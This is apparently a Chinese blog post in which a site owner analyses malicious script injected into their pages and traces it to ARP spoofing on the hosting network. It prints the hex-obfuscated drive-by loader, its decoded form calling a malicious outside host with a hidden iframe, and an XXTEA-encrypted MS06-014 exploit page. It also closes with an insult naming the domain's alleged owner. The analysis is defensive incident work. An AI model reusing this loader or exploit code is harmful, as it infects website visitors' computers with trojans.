此时检查网页源代码可发现网页顶部被加入了一句<scriptsrc=http://1.520sb.cn/1.js></script>
但这句代码不常出现
原以为服务器被人攻击了或者是服务器中病毒了
检查过所有出现过问题的页面及相关文件
没有发现异常
服务器也没有找到入侵痕迹
把这个js文件下载到本地,打开后发现是如下代码
window["x64x6fx63x75x6dx65x6ex74"]["x77x72x69x74x65x6cx6e"]("x3cx44x49x56x73x74x79x6cx65x3d"x43x55x52x53x4fx52x3ax75x72x6cx28'x68x74x74x70x3a//x31x2ex35x32x30x73x62x2ex63x6e/x6dx61/x31x2ex6ax70x67'x29"x3e");
window["x64x6fx63x75x6dx65x6ex74"]["x77x72x69x74x65x6cx6e"]("x3cx44x49x56x73x74x79x6cx65x3d"x43x55x52x53x4fx52x3ax75x72x6cx28'x68x74x74x70x3a//x31x2ex35x32x30x73x62x2ex63x6e/x6dx61/x32x2ex6ax70x67'x29"x3ex3c/x44x49x56x3ex3c/x44x49x56x3e");
window["x64x6fx63x75x6dx65x6ex74"]["x77x72x69x74x65x6cx6e"]("x3cx69x66x72x61x6dx65x73x72x63x3dx68x74x74x70x3a//x31x2ex35x32x30x73x62x2ex63x6e/x74x6ax2ex68x74x6dx77x69x64x74x68x3dx30x68x65x69x67x68x74x3dx30x3ex3c/x69x66x72x61x6dx65x3e")
16进制的转换,由于javascript运行时会自动转码,这段代码被嵌入后打开网页即自动运行。
我们使用document.write语句,把这段代码打印到页面上,转换后代码为
window["document"]["writeln"]("<DIVstyle="CURSOR:url('http://1.520sb.cn/ma/1.jpg')">");window["document"]["writeln"]("<DIVstyle="CURSOR:url('http://1.520sb.cn/ma/2.jpg')"></DIV></DIV>");window["document"]["writeln"]("<iframesrc=http://1.520sb.cn/tj.htmwidth=0height=0></iframe>")
http://1.520sb.cn/ma/1.jpg和http://1.520sb.cn/ma/2.jpg是两个木马文件,具体未查,http://1.520sb.cn/tj.htm包含统计和一个MS06014漏洞的利用脚本http://1.520sb.cn/mm/06014.htm
http://1.520sb.cn/mm/06014.htm的内容为
<scriptlanguage=javascript>
functionutf8to16(str){varout,i,len,c;varchar2,char3;out=[];len=str.length;i=0;while(i<len){c=str.charCodeAt(i++);switch(c>>4)
{case0:case1:case2:case3:case4:case5:case6:case7:out[out.length]=str.charAt(i-1);break;case12:case13:char2=str.charCodeAt(i++);out[out.length]=String.fromCharCode(((c&0x1F)<<6)|(char2&0x3F));break;case14:char2=str.charCodeAt(i++);char3=str.charCodeAt(i++);out[out.length]=String.fromCharCode(((c&0x0F)<<12)|((char2&0x3F)<<6)|((char3&0x3F)<<0));break;}}
returnout.join('');}
varbase64DecodeChars=newArray(-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,62,-1,-1,-1,63,52,53,54,55,56,57,58,59,60,61,-1,-1,-1,-1,-1,-1,-1,0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,-1,-1,-1,-1,-1,-1,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,-1,-1,-1,-1,-1);
functionbase64decode(str)
{varc1,c2,c3,c4;vari,len,out;len=str.length;i=0;out="";while(i<len)
{do
{c1=base64DecodeChars[str.charCodeAt(i++)&0xff]}while(i<len&&c1==-1);if(c1==-1)
break;do
{c2=base64DecodeChars[str.charCodeAt(i++)&0xff]}while(i<len&&c2==-1);if(c2==-1)
break;out+=String.fromCharCode((c1<<2)|((c2&0x30)>>4));do
{c3=str.charCodeAt(i++)&0xff;if(c3==61)
returnout;c3=base64DecodeChars[c3]}while(i<len&&c3==-1);if(c3==-1)
break;out+=String.fromCharCode(((c2&0XF)<<4)|((c3&0x3C)>>2));do
{c4=str.charCodeAt(i++)&0xff;if(c4==61)
returnout;c4=base64DecodeChars[c4]}while(i<len&&c4==-1);if(c4==-1)
break;out+=String.fromCharCode(((c3&0x03)<<6)|c4)}
returnout}
functionlong2str(v,w){varvl=v.length;varsl=v[vl-1]&0xffffffff;for(vari=0;i<vl;i++)
{v[i]=String.fromCharCode(v[i]&0xff,v[i]>>>8&0xff,v[i]>>>16&0xff,v[i]>>>24&0xff);}
if(w){returnv.join('').substring(0,sl);}
else{returnv.join('');}}
functionstr2long(s,w){varlen=s.length;varv=[];for(vari=0;i<len;i+=4)
{v[i>>2]=s.charCodeAt(i)|s.charCodeAt(i+1)<<8|s.charCodeAt(i+2)<<16|s.charCodeAt(i+3)<<24;}
if(w){v[v.length]=len;}
returnv;}
functionxxtea_decrypt(str,key){if(str==""){return"";}
varv=str2long(str,false);vark=str2long(key,false);varn=v.length-1;varz=v[n-1],y=v[0],delta=0x9E3779B9;varmx,e,q=Math.floor(6+52/(n+1)),sum=q*delta&0xffffffff;while(sum!=0){e=sum>>>2&3;for(varp=n;p>0;p--){z=v[p-1];mx=(z>>>5^y<<2)+(y>>>3^z<<4)^(sum^y)+(k[p&3^e]^z);y=v[p]=v[p]-mx&0xffffffff;}
z=v[n];mx=(z>>>5^y<<2)+(y>>>3^z<<4)^(sum^y)+(k[p&3^e]^z);y=v[0]=v[0]-mx&0xffffffff;sum=sum-delta&0xffffffff;}
returnlong2str(v,true);}
t="WxVGrqSVCFufJ2Q0UfFATtOcAf7JQXBkZV5bKcf0Dq/Y74mVvPn26A0t/IvHny4Yh4RYYIac/VDS3fyve81yHK1BjvX1Apl4NHpl/rnNED15lBZ+yMHdIxfcQnLw5Tl5fe/bM63GEdjh7hK3lks0phVie1B12g3fdnKwC2+mgNUlhUXA4+iyLe+NS68c7H4YNAYz++0kv/Pj5JtzWlqB9VuRmblzgTr1kVs6LwzBz5T7LqIWEMc75crmEnBaon4kCBNpiOI78chxVuqUICBOSDBJ5kCblDNsUh6XSUZsGJFbEfwEmaP4IpqYh/9XhLZ7r18whNFb2sDry116kkZOWlWv9jaqRx5MEgPDqtXgBWKR9MCDmZWxdeJ+VYhbnt9c/wnRAh7gq/1FfvbaSmWIMYTEb0cJ7BA9UQCCVguxB9xRrKjmd/qx6JgmUhashgxcR3T9jLk+TDLolNuvGw8DFNnv0orM403xi52oRsTdOTKj+h+jxUjWc8GlZ5Nsy4av4fokSt567oAB45KsK9FcrWgKV3vOhIsdrSSfAIVeUgj+4MGz5k9jdLHVMXaitumnbE5PZXiapExEtz0pliqK80XFipcB5Qy/CdHSEhb5L0Ctl2JDsavLC9ve02HDIAi7ISAaHlBgMTBH2s7tnHQh/IFHZPF898HpKBDM5Nf2sIuuirYTDlXb7KzhJruYRWU+ew715RyhSCqQheW9JZtCXSh25mpbQKw/2qbusz6diL36lJcLy8L/aro7aQyiSFeOa8H/0+85ZAC5o2Pw6DBwYSNrJdcOAMNLcTwJncVKbAOl7B7kwkWASCW3l+17fOGiKU9L+qs1Z1bmbDzqDSK98FNwOvI/lQ9jkEW8tP6BQZZy6un+4ozgxANpQUyZrq2CqAJXRXLxZabDj9Bq1N/2EdVKjYfgsRfqWaFe4owXS7a11WeBE9KuR3/P5lp3G/e4oPt0qVjUT+NlF3rCuf9eEw+3L/OpR8KVZboUOkV5bhWxiWLkf/HhhK3YeGMPaO6uJlFkmLroHoZnYAi1/oDNGziqc61FE2m/kbdOWUwX8tNmh16wb5Uf3g2NZ3M6Ma13kjEqus9hThzGrImK5YsXHS5e0Ludet04HStXz81rVHkivtiT";
t=utf8to16(xxtea_decrypt(base64decode(t),'fuckjapan'));
document.write(t);
</script>
记录待查。
由于没有查到服务器设置被更改及入侵的迹象,上网搜索了一下520sb,看到有人说到:和你们说的都无关这是arpsniffer的一种,数据包在送出到达网关的过程中被劫持主要原因是内网有计算机被控制,通过arp欺骗手段在某些关键字里加的。即使是简单的html页面也会被加入。因为arp技术的不稳定性,所以劫持的成功率不一样。
呵呵。客户有次遇到过,最后原因就是这个,重装系统都没用,找出那个计算机是关键
http://www.im286.com/archiver/tid-1886972.html
http://linux.chinaunix.net/bbs/thread-886420-4-1.html
那么就是说是服务器局域网的问题
想起万网有提供一个软件绑定网关ip和mac地址用来防止arp欺骗的小软件,连忙下载后运行,提示绑定成功,
刷新网站,但是发现插入的病毒代码依然存在。
打电话到万网,得到确实是arp欺骗的肯定回答,答检查有问题的主机需要到下周一,提示我下载他们的mac绑定工具,就是我原来运行的那个小软件,让我重启后再观察。
目前为止,问题貌似已解决,记录以上待查。
由于本blog放在同一服务器上,请这周浏览过本博滴朋友及时升级杀毒软件,并做好杀毒工作,如因此造成了任何损失,本人只能深深的致以歉意。
ps:520sb.cn的域名所有人是一个名为牛晓潘的sb,看看这个域名就知道了。